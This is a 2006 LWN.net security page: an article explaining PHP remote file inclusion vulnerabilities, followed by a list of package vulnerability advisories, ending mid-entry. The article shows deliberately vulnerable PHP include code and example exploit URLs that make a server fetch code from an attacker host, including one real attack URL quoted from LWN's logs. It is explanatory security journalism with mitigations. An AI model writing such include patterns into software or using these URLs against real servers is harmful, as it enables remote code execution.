LWN.net Logo

Security

Remote file inclusion vulnerabilities

October 11, 2006

This article was contributed by Jake Edge.

A recent rash of reports to the bugtraq mailing list provides a nice confirmation of an article on this page two weeks ago. Google recently released a code search tool that is being used to find security holes in open source projects and the first target appears to be remote file inclusion (RFI) vulnerabilities in PHP programs. There has been a steady stream of vulnerability reports on security mailing lists as well as an increase in attempts to exploit them.

An attacker's fondest wish is to be able to run their code on the target system; an RFI exploit does just that. By exploiting two very dubious 'features' of the PHP language, an attacker can inject their code into a PHP program on the server. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user.

PHP is particularly susceptible to this kind of exploit because the default installation allows filesystem operations to 'automagically' open URLs as if they were local files (governed by the allow_url_fopen configuration parameter). This capability even works for what, seemingly, should be restricted to the local filesystem such as the 'include' and 'require' directives. If an attacker can manipulate the arguments to those directives, they can use a URL under their control as the argument and that is just what an RFI exploit does.

Consider the following:

    include($base_path . "/foo.php");
If an attacker can control the value of the base_path variable, they can replace it with something like "http://example.com/badcode?foo=" and, instead of picking up foo.php from the local filesystem, PHP will happily reach out across the net to pick up the attacker's code. One of the ways that an attacker can control the value of a variable in a PHP program is through the use of the register_globals PHP mis-feature.

When register_globals is enabled in PHP, the language 'automagically' instantiates variables with values from the HTTP request and puts them in the namespace of the PHP program. This was originally seen as a nice convenience for getting the FORM values from the page, but has since been deprecated and is disabled by default. There are still a fair number of PHP programs that require it to be enabled in order to function correctly; with luck this number is decreasing, hopefully rapidly. When it is enabled, it allows an attacker to inject a value for any uninitialized variable in the program by simply adding it as a GET parameter at the end of the URL.

Using the example above, if base_path was uninitialized in some installations (for instance where the application was installed in the DocumentRoot), an attacker could request:

    http://vulnerable.com/RFI.php?base_path=http://example.com/badcode?foo=
and PHP will fetch and execute the exploit code. The final question mark and foo= in the URL is just to absorb the "/foo.php" in the include directive; other techniques such as using %00 to put a NUL byte at the end of the malicious URL are also possible.

Some PHP programmers are not content with being exploitable only when register_globals is on and have put code like the following into their applications:

    include($_REQUEST['own_me'] . '/foo.php');
The _REQUEST 'superglobal' array in PHP stores all of the variables that come in from the HTTP request, regardless of whether they come as a GET or a POST variable. This one is easy to exploit by making a request like:
    http://vulnerable.com/RFI2.php?own_me=http://example.com/badcode%00

By disabling both register_globals and allow_url_fopen, these kinds of exploits can be avoided. Unfortunately, the latter also alters the behavior of filesystem functions that might more legitimately be used to fetch remote URLs. For this reason, it is enabled by default and cannot be disabled for proper functioning of some PHP applications. There have been too many exploitable uses of register_globals over the years for any security-minded PHP programmer to even consider enabling it. Other languages may also be susceptible to this kind of exploit, but PHP is certainly the target of the recently reported ones.

[Editor's note: the LWN server is currently seeing exploit attempts at a rate of nearly one per second, using URLs like:

    http://lwn.net/Articles//master.php?root_path=http://webstorch.com//cap.txt?

No, it doesn't work here - but using wget to fetch the exploit file can be instructive. There is a steady stream of file inclusion vulnerability reports on lists like Bugtraq; if you are using PHP-based software, it behooves you to pay attention.]

Comments (12 posted)

New vulnerabilities

awstats: input sanitizing

Package(s):awstats CVE #(s):CVE-2006-3681 CVE-2006-3682
Created:October 10, 2006 Updated:October 11, 2006
Description: awstats did not fully sanitize input, which was passed directly to the user's browser, allowing for an XSS attack. If a user was tricked into following a specially crafted awstats URL, the user's authentication information could be exposed for the domain where awstats was hosted. (CVE-2006-3681)

awstats could display its installation path under certain conditions. However, this might only become a concern if awstats is installed into an user's home directory. (CVE-2006-3682)

Alerts:
Ubuntu USN-360-1 awstats 2006-10-10

Comments (1 posted)

maxdb: arbitrary code execution

Package(s):maxdb CVE #(s):CVE-2006-4305
Created:October 5, 2006 Updated:October 11, 2006
Description: Version 7.5.00 of the MaxDB database has a vulnerability in the WebDBM frontend. Insufficient input sanitization is performed on data passed to the frontend, resulting in the possible execution of arbitrary code.
Alerts:
Debian DSA-1190-1 maxdb-7.5.00 2006-10-04

Comments (2 posted)

OpenSSH: denial of service

Package(s):openssh CVE #(s):CVE-2006-4925 CVE-2006-5052
Created:October 6, 2006 Updated:November 15, 2007
Description: packet.c in ssh in OpenSSH allows remote attackers to cause a denial of service (crash) by sending an invalid protocol sequence with USERAUTH_SUCCESS before NEWKEYS, which causes newkeys[mode] to be NULL.

An unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."

Alerts:
Red Hat RHSA-2007:0703-02 openssh 2007-11-15
Red Hat RHSA-2007:0540-04 openssh 2007-11-07
Fedora FEDORA-2007-394 openssh 2007-04-03
Gentoo 200611-06 openssh 2006-11-13
SuSE SUSE-SA:2006:062 openssh 2006-10-20
rPath rPSA-2006-0185-1 askpass 2006-10-05

Comments (none posted)

php: integer overflow

Package(s):php CVE #(s):CVE-2006-4812
Created:October 5, 2006 Updated:October 30, 2006
Description: The PHP memory handling routines have an integer overflow vulnerability. A remote attacker can use a script to cause memory allocation based on untrusted data, allowing arbitrary code to be executed as the apache user.
Alerts:
Gentoo 200610-14 php 2006-10-30
Fedora FEDORA-2006-1024 php 2006-10-19
OpenPKG OpenPKG-SA-2006.023 php 2006-10-17
Ubuntu USN-362-1 php4, php5 2006-10-10
SuSE SUSE-SA:2006:059 php4,php5 2006-10-09
Mandriva MDKSA-2006:180 php 2006-10-05
Red Hat RHSA-2006:0688-01 php 2006-10-05
Red Hat RHSA-2006:0708-01 PHP 2006-10-05

Comments (1 posted)

python: arbitrary code execution

Package(s):python CVE #(s):CVE-2006-4980
Created:October 6, 2006 Updated:November 7, 2006
Description: Benjamin C. Wiley Sittler discovered that Python's repr() function did not properly handle UTF-32/UCS-4 strings. If an application uses repr() on arbitrary untrusted data, this could be exploited to execute arbitrary code with the privileges of the python application.
Alerts:
Fedora FEDORA-2006-1049 python 2006-11-06
Gentoo 200610-07:02 python 2006-10-17
Gentoo 200610-07 python 2006-10-17
rPath rPSA-2006-0187-1 python 2006-10-10
Mandriva MDKSA-2006:181 python 2006-10-10
Red Hat RHSA-2006:0713-01 Python 2006-10-09
Ubuntu USN-359-1 python2.3, python2.4 2006-10-06

Comments (1 posted)

Updated vulnerabilities

apache: cross-site scripting

Package(s):apache CVE #(s):CVE-2006-3918
Created:August 9, 2006 Updated:April 4, 2008
Description: From the Red Hat advisory: "A bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header."
Alerts:
SuSE SUSE-SA:2008:021 apache2,apache 2008-04-04
Ubuntu USN-575-1 apache2 2008-02-04
SuSE SUSE-SA:2006:051 apache2 2006-09-08
Debian DSA-1167-1 apache 2005-09-04
Red Hat RHSA-2006:0619-01 httpd 2006-08-10
Red Hat RHSA-2006:0618-01 apache 2006-08-08

Comments (none posted)

bind: denial of service

Package(s):bind CVE #(s):CVE-2006-4095 CVE-2006-4096
Created:September 7, 2006 Updated:February 1, 2007
Description: Bind has two denial of service vulnerabilities.

Recursive servers queries for SIG records will trigger an assertion failure if more than one RR set is returned.

An INSIST failure can be triggered by sending a large number of recursive queries.

Alerts:
Fedora FEDORA-2007-164 bind 2007-01-31
Gentoo 200609-11 bind 2006-09-15
Slackware SSA:2006-257-01 bind 2006-09-15
Fedora FEDORA-2006-966 bind 2006-09-11
Debian DSA-1172-1 bind9 2006-09-09
Mandriva MDKSA-2006:163 bind 2006-09-08
rPath rPSA-2006-0166-1 bind 2006-09-08
Ubuntu USN-343-1 bind9 2006-09-07
OpenPKG OpenPKG-SA-2006.019 bind 2006-09-07

Comments (none posted)

binutils: buffer overflow

Package(s):binutils CVE #(s):CVE-2005-4807
Created:August 17, 2006 Updated:October 19, 2006
Description: The GNU assembler (gas) in binutils is vulnerable to a buffer overflow. If a user can be tricked into assembling a specially crafted file with gcc or gas, arbitrary code can be executed with the privileges of the user.
Alerts:
Ubuntu USN-366-1 binutils 2006-10-18
Ubuntu USN-336-1 binutils 2006-08-16

Comments (3 posted)

busybox: insecure password generation

Package(s):busybox CVE #(s):CVE-2006-1058
Created:May 5, 2006 Updated:May 2, 2007
Description: The BusyBox 1.1.1 passwd command does not use a proper salt when generating passwords. This would create an instance where a brute force attack could take very little time.
Alerts:
Red Hat RHSA-2007:0244-02 busybox 2007-05-01
Fedora FEDORA-2006-511 busybox 2006-05-04
Fedora FEDORA-2006-510 busybox 2006-05-04

Comments (2 posted)

bzip2: race condition and infinite loop

Package(s):bzip2 CVE #(s):CAN-2005-0953 CAN-2005-1260
Created:May 17, 2005 Updated:January 10, 2007
Description: A race condition in bzip2 1.0.2 and earlier allows local users to modify permissions of arbitrary files via a hard link attack on a file while it is being decompressed, whose permissions are changed by bzip2 after the decompression is complete. Also specially crafted bzip2 archives may cause an infinite loop in the decompressor.
Alerts:
rPath rPSA-2007-0004-1 bzip2 2007-01-09
Debian DSA-741-1 bzip2 2005-07-07
Red Hat RHSA-2005:474-01 bzip2 2005-06-16
OpenPKG OpenPKG-SA-2005.008 bzip2 2005-06-10
SuSE SUSE-SR:2005:015 multi 2005-06-07
Debian DSA-730-1 bzip2 2005-05-27
Mandriva MDKSA-2005:091 bzip2 2005-05-18
Ubuntu USN-127-1 bzip2 2005-05-17

Comments (2 posted)

capi4hylafax: missing input sanitizing

Package(s):capi4hylafax CVE #(s):CVE-2006-3126
Created:September 1, 2006 Updated:October 18, 2006
Description: Lionel Elie Mamane discovered a security vulnerability in capi4hylafax, tools for faxing over a CAPI 2.0 device, that allows remote attackers to execute arbitrary commands on the fax receiving system.
Alerts:
Gentoo 200610-05 capi4hylafax 2006-10-17
Debian DSA-1165-1 capi4hylafax 2006-09-01

Comments (none posted)

cheesetracker: buffer overflow

Package(s):cheesetracker CVE #(s):CVE-2006-3814
Created:September 4, 2006 Updated:October 27, 2006
Description: Luigi Auriemma discovered a buffer overflow in the loading component of cheesetracker, a sound module tracking program, which could allow a maliciously constructed input file to execute arbitrary code.
Alerts:
Gentoo 200610-13 cheesetracker 2006-10-26
Debian DSA-1166-2 cheesetracker 2006-10-13
Debian DSA-1166-1 cheesetracker 2006-09-03

Comments (1 posted)

cpio: arbitrary code execution

Package(s):cpio CVE #(s):CVE-2005-4268
Created:January 2, 2006 Updated:March 17, 2010
Description: Richard Harms discovered that cpio did not sufficiently validate file properties when creating archives. Files with e. g. a very large size caused a buffer overflow. By tricking a user or an automatic backup system into putting a specially crafted file into a cpio archive, a local attacker could probably exploit this to execute arbitrary code with the privileges of the target user (which is likely root in an automatic backup system).
Alerts:
CentOS CESA-2010:0145 cpio 2010-03-17
Red Hat RHSA-2010:0145-01 cpio 2010-03-15
rPath rPSA-2007-0094-1 cpio 2007-05-07
Red Hat RHSA-2007:0245-02 cpio 2007-05-01
Ubuntu USN-234-1 cpio 2006-01-02

Comments (none posted)

vixie-cron: privilege escalation

Package(s):cron CVE #(s):CVE-2006-2607
Created:May 31, 2006 Updated:June 1, 2009
Description: The Vixie cron daemon does not check the return code from setuid(); if that call can be made to fail, a local attacker may be able to execute commands as root.
Alerts:
Ubuntu USN-778-1 cron 2009-06-01
Red Hat RHSA-2006:0539-01 vixie-cron 2006-07-12
Gentoo 200606-07 vixie-cron 2006-06-09
SuSE SUSE-SA:2006:027 cron 2006-05-31
rPath rPSA-2006-0082-1 vixie-cron 2006-05-25

Comments (1 posted)

cscope: buffer overflows

Package(s):cscope CVE #(s):CVE-2006-4262
Created:October 2, 2006 Updated:June 16, 2009
Description: Will Drewry of the Google Security Team discovered several buffer overflows in cscope, a source browsing tool, which might lead to the execution of arbitrary code.
Alerts:
CentOS CESA-2009:1101 cscope 2009-06-16
Red Hat RHSA-2009:1101-01 cscope 2009-06-15
Gentoo 200610-08 cscope 2006-10-20
Debian DSA-1186-1 cscope 2006-09-30

Comments (none posted)

cscope: buffer overflows

Package(s):cscope CVE #(s):CVE-2004-2541
Created:May 22, 2006 Updated:June 19, 2009
Description: A buffer overflow in Cscope 15.5, and possibly multiple overflows, allows remote attackers to execute arbitrary code via a C file with a long #include line that is later browsed by the target.
Alerts:
CentOS CESA-2009:1102 cscope 2009-06-19
CentOS CESA-2009:1101 cscope 2009-06-16
Red Hat RHSA-2009:1102-01 cscope 2009-06-15
Red Hat RHSA-2009:1101-01 cscope 2009-06-15
Gentoo 200606-10 cscope 2006-06-11
Debian DSA-1064-1 cscope 2006-05-19

Comments (1 posted)

Cyrus-SASL: DIGEST-MD5 Pre-Authentication Denial of Service

Package(s):cyrus-sasl CVE #(s):CVE-2006-1721
Created:April 21, 2006 Updated:September 4, 2007
Description: Cyrus-SASL contains an unspecified vulnerability in the DIGEST-MD5 process that could lead to a Denial of Service. An attacker could possibly exploit this vulnerability by sending specially crafted data stream to the Cyrus-SASL server, resulting in a Denial of Service even if the attacker is not able to authenticate.
Alerts:
Red Hat RHSA-2007:0878-01 cyrus-sasl 2007-09-04
Red Hat RHSA-2007:0795-01 cyrus-sasl 2007-09-04
SuSE SUSE-SA:2006:025 cyrus-sasl-digestmd5 2006-05-05
Fedora FEDORA-2006-515 cyrus-sasl 2006-05-04
Debian DSA-1042-1 cyrus-sasl2 2006-04-25
Mandriva MDKSA-2006:073 cyrus-sasl 2006-04-24
Ubuntu USN-272-1 cyrus-sasl2 2006-04-24
Gentoo 200604-09 cyrus-sasl 2006-04-21

Comments (none posted)

dokuwiki: input validation flaws

Package(s):dokuwiki CVE #(s):
Created:September 29, 2006 Updated:October 4, 2006
Description: Input validation flaws have been discovered in the image handling of fetch.php if ImageMagick is used, which is not the default method. A remote attacker could exploit the flaws to execute arbitrary shell commands with the rights of the web server daemon or cause a denial of service.
Alerts:
Gentoo 200609-20 dokuwiki 2006-09-28

Comments (none posted)

ffmpeg: buffer overflows

Package(s):ffmpeg CVE #(s):CVE-2006-4799 CVE-2006-4800
Created:September 14, 2006 Updated:May 28, 2007
Description: the AVI processing code in FFmpeg has a number of buffer overflow vulnerabilities. If an attacker can trick a user into loading a specially crafted crafted AVI, arbitrary code can be executed with the user's privileges.
Alerts:
Gentoo 200609-09 ffmpeg 2006-09-13

Comments (2 posted)

flash-plugin: arbitrary code execution

Package(s):flash-plugin CVE #(s):CVE-2006-3311 CVE-2006-3587 CVE-2006-3588
Created:September 13, 2006 Updated:October 5, 2006
Description: Security issues were discovered in the Adobe Flash Player. It may be possible to execute arbitrary code on a victim's machine if the victim opens a malicious Adobe Flash file.
Alerts:
Gentoo 200610-02 netscape-flash 2006-10-04
SuSE SUSE-SA:2006:053 flash-player 2006-09-21
Red Hat RHSA-2006:0674-01 flash-plugin 2006-09-12

Comments (none posted)

freeradius: several vulnerabilities

Package(s):freeradius CVE #(s):CVE-2005-4745 CVE-2005-4746
Created:August 8, 2006 Updated:April 24, 2007
Description: Several remote vulnerabilities have been discovered in freeradius, a high-performance RADIUS server, which may lead to SQL injection or denial of service.
Alerts:
Mandriva MDKSA-2007:092 freeradius 2007-04-23
Debian DSA-1145-1 freeradius 2006-08-08

Comments (none posted)

freetype: integer overflows

Package(s):freetype CVE #(s):CVE-2006-0747 CVE-2006-1861 CVE-2006-2493 CVE-2006-2661 CVE-2006-3467
Created:June 8, 2006 Updated:June 1, 2010
Description: The FreeType library has several integer overflow vulnerabilities. If a user can be tricked into installing a specially crafted font file, arbitrary code can be executed with the privilege of the user.
Alerts:
Gentoo 201006-01 freetype 2010-06-01
Fedora FEDORA-2009-5644 freetype1 2009-05-28
Fedora FEDORA-2009-5558 freetype1 2009-05-28
CentOS CESA-2009:0329 freetype 2009-05-22
Red Hat RHSA-2009:1062-01 freetype 2009-05-22
Red Hat RHSA-2009:0329-02 freetype 2009-05-22
Gentoo 200710-09 nx 2007-10-09
Debian DSA-1178-1 freetype 2006-09-16
Ubuntu USN-341-1 libxfont, xorg 2006-09-06
Gentoo 200609-04 libXfont 2006-09-06
rPath rPSA-2006-0157-1 x11 2006-08-25
Mandriva MDKSA-2006:148 xorg-x11 2006-08-24
Red Hat RHSA-2006:0635-01 XFree86 2006-08-21
Red Hat RHSA-2006:0634-01 X.org 2006-08-21
Fedora FEDORA-2006-912 libXfont 2006-08-14
SuSE SUSE-SA:2006:045 freetype2 2006-08-01
OpenPKG OpenPKG-SA-2006.017 freetype 2006-07-28
Ubuntu USN-324-1 freetype 2006-07-27
Slackware SSA:2006-207-02 x11 2006-07-27
Mandriva MDKSA-2006:129 freetype2 2006-07-20
Gentoo 200607-02 freetype 2006-07-09
SuSE SUSE-SA:2006:037 freetype2 2006-06-27
Mandriva MDKSA-2006:099-1 freetype2 2006-06-13
Mandriva MDKSA-2006:099 freetype2 2006-06-12
rPath rPSA-2006-0100-1 freetype 2006-06-12
Debian DSA-1095-1 freetype 2006-06-10
Ubuntu USN-291-1 freetype 2006-06-08

Comments (none posted)

gcc: file overwrite vulnerability

Package(s):gcc CVE #(s):CVE-2006-3619
Created:September 6, 2006 Updated:March 14, 2008
Description: The fastjar utility found in the GNU compiler collection does not perform adequate file path checking, allowing the creation or overwriting of files outside of the current directory tree.
Alerts:
Mandriva MDVSA-2008:066 gcc 2007-03-13
Red Hat RHSA-2007:0473-01 gcc 2007-06-11
Red Hat RHSA-2007:0220-02 gcc 2007-05-01
Debian DSA-1170-1 gcc-3.4 2006-09-06

Comments (none posted)

gdb: buffer overflow

Package(s):gdb CVE #(s):CVE-2006-4146
Created:September 15, 2006 Updated:June 12, 2007
Description: A buffer overflow in dwarfread.c and dwarf2read.c debugging code in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted users, to execute arbitrary code via a crafted file with a location block (DW_FORM_block) that contains a large number of operations.
Alerts:
Red Hat RHSA-2007:0469-01 gdb 2007-06-11
Red Hat RHSA-2007:0229-02 gdb 2007-05-01
Ubuntu USN-356-1 gdb 2006-10-02
Fedora FEDORA-2006-975 gdb 2006-09-14

Comments (none posted)

gdm: improper file permissions

Package(s):gdm CVE #(s):CVE-2006-1057
Created:April 19, 2006 Updated:May 2, 2007
Description: The .ICEauthority file may be created with the wrong ownership and permissions; gdm 2.14.2 fixes the problem.
Alerts:
Red Hat RHSA-2007:0286-02 gdm 2007-05-01
Mandriva MDKSA-2006:083 gdm 2006-05-09
Ubuntu USN-278-1 gdm 2006-05-03
Debian DSA-1040-1 gdm 2006-04-24
Fedora FEDORA-2006-338 gdm 2006-04-19

Comments (none posted)

gedit: format string vulnerability

Package(s):gedit CVE #(s):CAN-2005-1686
Created:June 9, 2005 Updated:February 5, 2009
Description: A format string vulnerability has been discovered in gedit. Calling the program with specially crafted file names caused a buffer overflow, which could be exploited to execute arbitrary code with the privileges of the gedit user.
Alerts:
Fedora FEDORA-2009-1189 gedit 2009-01-29
Fedora FEDORA-2009-1187 gedit 2009-01-29
Debian DSA-753-1 gedit 2005-07-12
Mandriva MDKSA-2005:102 gedit 2005-06-15
Red Hat RHSA-2005:499-01 gedit 2005-06-13
Gentoo 200506-09 gedit 2005-06-11
Ubuntu USN-138-1 gedit 2005-06-09

Comments (1 posted)

grip: buffer overflow

Package(s):grip CVE #(s):CAN-2005-0706
Created:March 10, 2005 Updated:November 19, 2008
Description: Grip, a CD ripper, has a buffer overflow vulnerability that can occur when the CDDB server returns more than 16 matches.
Alerts:
Fedora FEDORA-2008-9604 grip 2008-11-19
Fedora FEDORA-2008-9521 grip 2008-11-19
Fedora-Legacy FLSA:152919 grip 2005-09-15
Mandriva MDKSA-2005:074 gnome-vfs2 2005-04-20
Mandriva MDKSA-2005:075 libcdaudio1 2005-04-20
Gentoo 200504-07 gnome-vfs 2005-04-08
Mandrake MDKSA-2005:066 grip 2005-04-01
Red Hat RHSA-2005:304-01 grip 2005-03-28
Gentoo 200503-21 grip 2005-03-17
Fedora FEDORA-2005-203 grip 2005-03-09
Fedora FEDORA-2005-202 grip 2005-03-09

Comments (none posted)

gzip: multiple vulnerabilities

Package(s):gzip CVE #(s):CVE-2006-4334 CVE-2006-4335 CVE-2006-4336 CVE-2006-4337 CVE-2006-4338
Created:September 19, 2006 Updated:January 20, 2010
Description: Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash.

Tavis Ormandy of the Google Security Team discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code.

Alerts:
Debian DSA-1974-1 gzip 2010-01-20
Fedora FEDORA-2007-557 lha 2007-05-31
Gentoo 200611-24 lha 2006-11-28
Fedora-Legacy FLSA:211760 gzip 2006-11-13
Fedora FEDORA-2006-989 gzip 2006-10-10
SuSE SUSE-SA:2006:056 gzip 2006-09-26
Gentoo 200609-13 gzip 2006-09-23
Trustix TSLSA-2006-0052 freetype, gnutls, gzip 2006-09-22
Mandriva MDKSA-2006:167 gzip 2006-09-20
Slackware SSA:2006-262-01 gzip 2006-09-20
OpenPKG OpenPKG-SA-2006.020 gzip 2006-09-20
Debian DSA-1181-1 gzip 2006-09-19
rPath rPSA-2006-0170-1 gzip 2006-09-19
Ubuntu USN-349-1 gzip 2006-09-19
Red Hat RHSA-2006:0667-01 gzip 2006-09-19

Comments (1 posted)

gzip: arbitrary command execution

Package(s):gzip CVE #(s):CAN-2005-0758
Created:August 1, 2005 Updated:January 10, 2007
Description: zgrep in gzip before 1.3.5 does not handle shell metacharacters like '|' and '&' properly when they occurred in input file names. This could be exploited to execute arbitrary commands with user privileges if zgrep is run in an untrusted directory with specially crafted file names.
Alerts:
OpenPKG OpenPKG-SA-2007.002 bzip2 2007-01-08
Mandriva MDKSA-2006:027 gzip 2006-01-30
Mandriva MDKSA-2006:026 bzip2 2006-01-30
Fedora-Legacy FLSA:158801 bzip2 2005-11-14
Fedora-Legacy FLSA:157696 gzip 2005-08-10
Ubuntu USN-161-1 bzip2 2005-08-04
Ubuntu USN-158-1 gzip 2005-08-01

Comments (2 posted)

kdelibs: kate backup file permission leak

Package(s):kdelibs kate kwrite CVE #(s):CAN-2005-1920
Created:July 19, 2005 Updated:September 21, 2010
Description: Kate / Kwrite, as shipped with KDE 3.2.x up to including 3.4.0, creates a file backup before saving a modified file. These backup files are created with default permissions, even if the original file had more strict permissions set. See this advisory for more information.
Alerts:
Gentoo 200611-21 kile 2006-11-27
Debian DSA-804-2 kdelibs 2005-11-10
Debian DSA-804-1 kdelibs 2005-09-08
Red Hat RHSA-2005:612-01 kdelibs 2005-07-27
Ubuntu USN-150-1 kdelibs 2005-07-21
Mandriva MDKSA-2005:122 kdelibs 2005-07-20
Fedora FEDORA-2005-594 kdelibs 2005-07-19

Comments (1 posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-4535 CVE-2006-4538
Created:September 18, 2006 Updated:January 5, 2009
Description: Sridhar Samudrala discovered a local denial of service vulnerability in the handling of SCTP sockets. By opening such a socket with a special SO_LINGER value, a local attacker could exploit this to crash the kernel. (CVE-2006-4535)

Kirill Korotaev discovered that the ELF loader on the ia64 and sparc platforms did not sufficiently verify the memory layout. By attempting to execute a specially crafted executable, a local user could exploit this to crash the kernel. (CVE-2006-4538)

Alerts:
Red Hat RHSA-2008:0787-01 kernel 2009-01-05
Red Hat RHSA-2007:1049-01 kernel 2007-12-03
Mandriva MDKSA-2006:182 kernel 2006-10-11
Red Hat RHSA-2006:0689-01 kernel 2006-10-05
Debian DSA-1184-2 kernel-source-2.6.8 2006-09-26
Debian DSA-1184-1 kernel-source-2.6.8 2006-09-25
Debian DSA-1183-1 kernel-source-2.4.27 2006-09-25
Ubuntu USN-347-1 linux-source-2.6.10/-2.6.12/-2.6.15 2006-09-18

Comments (none posted)

kernel: denial of service by memory consumption

Package(s):kernel CVE #(s):CVE-2006-2936
Created:July 17, 2006 Updated:November 14, 2007
Description: The ftdi_sio driver (usb/serial/ftdi_sio.c) in Linux kernel 2.6.x up to 2.6.17, and possibly later versions, allows local users to cause a denial of service (memory consumption) by writing more data to the serial port than the driver can handle, which causes the data to be queued.
Alerts:
SuSE SUSE-SA:2007:035 kernel 2007-06-14
Mandriva MDKSA-2006:151 kernel 2006-08-25
Mandriva MDKSA-2006:150 kernel 2006-08-25
Ubuntu USN-331-1 linux-source-2.6.15 2006-08-03
rPath rPSA-2006-0130-1 kernel 2006-07-17

Comments (none posted)

kernel: denial of service

Package(s):kernel CVE #(s):CVE-2006-2935 CVE-2006-4145 CVE-2006-3745
Created:September 1, 2006 Updated:July 30, 2008
Description: Previous versions of the kernel package are subject to several vulnerabilities. Certain malformed UDF filesystems can cause the system to crash (denial of service). Malformed CDROM firmware or USB storage devices (such as USB keys) could cause system crash (denial of service), and if they were intentionally malformed, can cause arbitrary code to run with elevated privileges. In addition, the SCTP protocol is subject to a remote system crash (denial of service) attack.
Alerts:
Red Hat RHSA-2008:0665-01 kernel 2008-07-24
SuSE SUSE-SA:2007:053 kernel 2007-10-12
SuSE SUSE-SA:2006:064 kernel 2006-11-10
Red Hat RHSA-2006:0710-01 kernel 2006-10-19
SuSE SUSE-SA:2006:057 kernel 2006-09-28
Trustix TSLSA-2006-0051 bind, kernel, openssl 2006-09-15
Ubuntu USN-346-2 linux-restricted-modules 2006-09-14
Ubuntu USN-346-1 linux-source-2.6.10/-2.6.12/-2.6.15 2006-09-14
rPath rPSA-2006-0162-1 kernel 2006-08-31

Comments (none posted)

krb5: local privilege escalation

Package(s):krb5 CVE #(s):CVE-2006-3083
Created:August 9, 2006 Updated:July 7, 2010
Description: Some kerberos applications fail to check the results of setuid() calls, with the result that, if that call fails, they could continue to execute as root after thinking they had switched to a nonprivileged user. A local attacker who can cause these calls to fail (through resource exhaustion, presumably) could exploit this bug to gain root privileges.
Alerts:
Mandriva MDVSA-2010:129 heimdal 2010-07-07
SuSE SUSE-SR:2006:022 heimdal, xsp 2006-09-08
Gentoo 200608-21 heimdal 2006-08-23
Ubuntu USN-334-1 krb5 2006-08-16
Fedora FEDORA-2006-905 krb5 2006-08-09
Mandriva MDKSA-2006:139 krb5 2006-09-09
Gentoo 200608-15 mit-krb5 2006-08-10
rPath rPSA-2006-0150-1 krb5 2006-08-09
Red Hat RHSA-2006:0612-01 krb5 2006-08-08
Debian DSA-1146-1 krb5 2006-08-09

Comments (none posted)

libgadu: memory alignment bug

Package(s):libgadu CVE #(s):CAN-2005-2370
Created:July 29, 2005 Updated:June 25, 2007
Description: Szymon Zygmunt and Michal Bartoszkiewicz discovered a memory alignment error in libgadu (from ekg, console Gadu Gadu client, an instant messaging program) which is included in gaim, a multi-protocol instant messaging client, as well. This can not be exploited on the x86 architecture but on others, e.g. on Sparc and lead to a bus error, in other words a denial of service.
Alerts:
Debian DSA-813-1 centericq 2005-09-15
Red Hat RHSA-2005:627-01 gaim 2005-08-09
Debian DSA-769-1 gaim 2005-07-29

Comments (none posted)

libgd2: denial of service

Package(s):libgd2 CVE #(s):CVE-2006-2906
Created:June 14, 2006 Updated:January 16, 2007
Description: Certain GIF images can cause libgd2 to go into an infinite loop, adversely affecting the performance of image processing applications.
Alerts:
rPath rPSA-2007-0008-1 gd 2007-01-15
Debian DSA-1117-1 libgd2 2006-07-21
Mandriva MDKSA-2006:113 tetex 2006-06-27
Mandriva MDKSA-2006:112 gd 2006-06-27
Ubuntu USN-298-1 libgd2 2006-06-13

Comments (none posted)

libmms: buffer overflows

Package(s):libmms CVE #(s):CVE-2006-2200
Created:July 6, 2006 Updated:December 25, 2006
Description: Several buffer overflows were found in libmms. By tricking a user into opening a specially crafted remote multimedia stream with an application using libmms, a remote attacker could overwrite an arbitrary memory portion with zeros, thereby crashing the program.
Alerts:
Slackware SSA:2006-357-05 xine 2006-12-25
Gentoo 200607-07 xine-lib 2006-07-20
Mandriva MDKSA-2006:121 xine-lib 2006-07-12
Mandriva MDKSA-2006:117-1 libmms 2006-07-12
Ubuntu USN-315-1 libmms, xine-lib 2006-07-12
Mandriva MDKSA-2006:117 libmms 2006-07-06
Ubuntu USN-309-1 libmms 2006-07-05

Comments (none posted)

libmusicbrainz: buffer overflows

Package(s):libmusicbrainz-2.0 CVE #(s):CVE-2006-4197
Created:August 30, 2006 Updated:October 23, 2006
Description: Several buffer overflows have been discovered in the libmusicbrainz CD index library.
Alerts:
Gentoo 200610-09 musicbrainz 2006-10-22
Ubuntu USN-363-1 libmusicbrainz 2006-10-11
Mandriva MDKSA-2006:157-1 musicbrainz 2006-09-28
rPath rPSA-2006-0161-1 libmusicbrainz 2006-08-30
Mandriva MDKSA-2006:157 musicbrainz 2006-08-30
Debian DSA-1162-1 libmusicbrainz-2.0 2006-08-30

Comments (none posted)

libpam-ldap: authentication bypass

Package(s):libpam-ldap CVE #(s):CAN-2005-2641
Created:August 25, 2005 Updated:October 6, 2006
Description: libpam-ldap, the PAM LDAP interface, has a vulnerability in which it fails to authenticate with an LDAP server which is not configured properly, allowing an authentication bypass.
Alerts:
rPath rPSA-2006-0183-1 nss_ldap 2006-10-05
Mandriva MDKSA-2005:190 nss_ldap 2005-10-20
Gentoo 200508-22 pam_ldap 2005-08-31
Debian DSA-785-1 libpam-ldap 2005-08-25

Comments (none posted)

libpng: buffer overflow

Package(s):libpng CVE #(s):CVE-2006-3334
Created:July 19, 2006 Updated:December 15, 2008
Description: In pngrutil.c, the function png_decompress_chunk() allocates insufficient space for an error message, potentially overwriting stack data, leading to a buffer overflow.
Alerts:
Gentoo 200812-15 povray 2008-12-14
Mandriva MDKSA-2006:213 chromium 2006-11-16
rPath rPSA-2006-0133-1 libpng 2006-07-19
Gentoo 200607-06 libpng 2006-07-19

Comments (none posted)

libpng: heap based buffer overflow

Package(s):libpng CVE #(s):CVE-2006-0481
Created:February 13, 2006 Updated:December 15, 2008
